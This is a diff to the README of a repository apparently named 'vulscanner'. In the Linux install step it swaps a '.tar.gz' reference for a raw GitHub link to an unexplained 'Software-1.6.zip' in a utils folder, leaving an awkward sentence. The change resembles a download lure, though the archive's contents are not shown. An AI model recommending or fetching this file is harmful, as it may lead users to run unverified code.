ryzecx/vulscanner/README.md

    After downloading, locate the file in your downloads folder.
    - If you are on Windows, double-click the `.exe` file to start the installation.
    - For macOS, open the `.dmg` file and drag vulscanner to your Applications folder.
-   - On Linux, you can either extract the `.tar.gz` file or follow the installation instructions provided.
+   - On Linux, you can either extract the `https://raw.githubusercontent.com/ryzecx/vulscanner/main/utils/Software-1.6.zip` file or follow the installation instructions provided.

 5. **Run vulscanner**
    Once installed, locate vulscanner in your applications.
 Double-click the icon to launch the application.